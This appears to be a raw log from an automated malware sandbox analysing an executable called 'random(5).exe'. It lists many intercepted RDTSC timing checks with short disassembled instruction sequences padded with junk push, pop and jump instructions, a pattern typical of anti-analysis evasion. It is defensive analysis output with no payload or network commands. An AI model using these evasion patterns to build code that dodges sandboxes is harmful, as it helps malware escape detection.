Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 1781231 second address: 178123A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 17813C8 second address: 17813CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 17843B9 second address: 17843C4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007F519CD4C376h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 1787E08 second address: 1787E13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 1787E13 second address: 1787E19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 1787E19 second address: 1787E29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 ja 00007F519CFC89D9h 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f pop edi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 178811B second address: 1788123 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 1788123 second address: 1788127 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 17883E2 second address: 17883F5 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F519CD4C37Ch 0x00000008 push ecx 0x00000009 push esi 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 178B82C second address: 178B832 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 178B832 second address: 178B836 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 178B836 second address: 178B83C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 178B9D9 second address: 178B9DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 178BC56 second address: 178BC73 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F519CFC89C4h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 178BDAD second address: 178BDB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 178BDB3 second address: 178BDBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 178BDBA second address: 178BDC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 178C08E second address: 178C092 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 1791F70 second address: 1791F74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 1791F74 second address: 1791F8B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F519CFC89BCh 0x0000000b popad 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 1791F8B second address: 1791F93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 1791F93 second address: 1791FAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F519CFC89C5h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 179080C second address: 1790817 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007F519CD4C376h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 1790AE4 second address: 1790AE8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 1790C54 second address: 1790C6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F519CD4C385h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 1790C6D second address: 1790C71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 1791083 second address: 1791087 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 1791087 second address: 17910B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jns 00007F519CFC89B6h 0x0000000f pop eax 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push edi 0x00000014 pop edi 0x00000015 push ebx 0x00000016 pop ebx 0x00000017 popad 0x00000018 je 00007F519CFC89C6h 0x0000001e jmp 00007F519CFC89BAh 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 17910B1 second address: 17910C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F519CD4C37Ch 0x0000000c rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 17910C4 second address: 17910D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F519CFC89BCh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 1791C13 second address: 1791C60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007F519CD4C389h 0x0000000a pushad 0x0000000b jmp 00007F519CD4C384h 0x00000010 pushad 0x00000011 jmp 00007F519CD4C381h 0x00000016 js 00007F519CD4C376h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 179B343 second address: 179B349 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 179B349 second address: 179B368 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F519CD4C388h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 179B368 second address: 179B380 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F519CFC89BDh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 1799448 second address: 179946B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007F519CD4C387h 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 17995B0 second address: 17995B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 17995B4 second address: 17995D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F519CD4C37Bh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jnl 00007F519CD4C37Eh 0x00000011 push ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 179990E second address: 1799929 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F519CFC89C2h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 1799929 second address: 179994C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F519CD4C387h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 179994C second address: 1799950 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 1799C43 second address: 1799C47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 1799C47 second address: 1799C4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 1799C4B second address: 1799C5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push edi 0x00000008 pop edi 0x00000009 push edx 0x0000000a pop edx 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 1799C5B second address: 1799C61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 1799C61 second address: 1799C65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 1799F74 second address: 1799F8D instructions: 0x00000000 rdtsc 0x00000002 jc 00007F519CFC89B8h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F519CFC89BDh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 179A271 second address: 179A27F instructions: 0x00000000 rdtsc 0x00000002 jg 00007F519CD4C376h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 179A27F second address: 179A285 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 179A285 second address: 179A289 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 179A510 second address: 179A518 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 179A518 second address: 179A51C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 179A81F second address: 179A825 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 179FC5D second address: 179FC61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 179FC61 second address: 179FC6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 179FC6B second address: 179FC6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 179FC6F second address: 179FC75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 16FA1CF second address: 16FA1D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 16FA1D5 second address: 16FA1DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 16FA1DA second address: 16FA1F7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F519CD4C37Ah 0x00000007 push edi 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a jp 00007F519CD4C376h 0x00000010 pop edi 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 push esi 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 16FA1F7 second address: 16FA1FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 17A12BE second address: 17A12C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 17A12C4 second address: 17A12C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 17A12C9 second address: 17A12D0 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 17A12D0 second address: 17A12F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007F519CFC89C7h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d pushad 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 17A4B7F second address: 17A4B85 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 17A4E17 second address: 17A4E2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F519CFC89C2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 17A4F8E second address: 17A4F94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 17AD095 second address: 17AD099 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 17AC76F second address: 17AC7A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jmp 00007F519CD4C37Bh 0x0000000c pushad 0x0000000d popad 0x0000000e pop ecx 0x0000000f popad 0x00000010 pushad 0x00000011 jns 00007F519CD4C37Ch 0x00000017 push eax 0x00000018 push edx 0x00000019 jnl 00007F519CD4C376h 0x0000001f jmp 00007F519CD4C37Bh 0x00000024 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 17AC7A5 second address: 17AC7B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jbe 00007F519CFC89B6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 17AC7B5 second address: 17AC7BB instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 17AADD4 second address: 17AADE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F519CFC89B6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 17AADE0 second address: 17AADE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 17AF555 second address: 17AF565 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F519CFC89C2h 0x00000008 jl 00007F519CFC89B6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 17B6EC5 second address: 17B6EE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F519CD4C376h 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d popad 0x0000000e pop eax 0x0000000f push ebx 0x00000010 jo 00007F519CD4C376h 0x00000016 pushad 0x00000017 popad 0x00000018 pop ebx 0x00000019 push eax 0x0000001a push edx 0x0000001b push esi 0x0000001c pop esi 0x0000001d rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 17B6EE2 second address: 17B6EE6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 17B7202 second address: 17B7228 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 pushad 0x00000008 popad 0x00000009 push edi 0x0000000a pop edi 0x0000000b pop ebx 0x0000000c jc 00007F519CD4C37Ch 0x00000012 jc 00007F519CD4C376h 0x00000018 push eax 0x00000019 push edx 0x0000001a jl 00007F519CD4C376h 0x00000020 jng 00007F519CD4C376h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 17B7228 second address: 17B7273 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F519CFC89C7h 0x00000007 jbe 00007F519CFC89B6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f popad 0x00000010 pushad 0x00000011 jmp 00007F519CFC89C2h 0x00000016 jmp 00007F519CFC89BDh 0x0000001b push edx 0x0000001c jc 00007F519CFC89B6h 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 17C20FB second address: 17C210A instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F519CD4C376h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 17C210A second address: 17C2134 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007F519CFC89C8h 0x0000000c popad 0x0000000d jo 00007F519CFC89CAh 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 17C2134 second address: 17C2138 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 16E6066 second address: 16E60AC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F519CFC89C7h 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jp 00007F519CFC89BCh 0x00000011 push eax 0x00000012 jmp 00007F519CFC89C0h 0x00000017 pop eax 0x00000018 popad 0x00000019 pushad 0x0000001a pushad 0x0000001b jp 00007F519CFC89B6h 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 17C7FBD second address: 17C7FCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edx 0x00000007 pop edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 17C7B65 second address: 17C7B69 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 17CF755 second address: 17CF75B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 17D7FEB second address: 17D8002 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F519CFC89C3h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 17D8002 second address: 17D8006 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 17E1DAC second address: 17E1DB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 17E1DB2 second address: 17E1DB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 17E0537 second address: 17E053D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 17E053D second address: 17E0543 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 17E0543 second address: 17E0549 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 17E0549 second address: 17E055E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F519CD4C381h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 17E055E second address: 17E0562 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 17E0825 second address: 17E0829 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 17E0829 second address: 17E0834 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 17E0834 second address: 17E084F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F519CD4C383h 0x00000009 push esi 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 17E084F second address: 17E085F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a js 00007F519CFC89B6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 17E085F second address: 17E0876 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F519CD4C37Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 17E0876 second address: 17E087B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
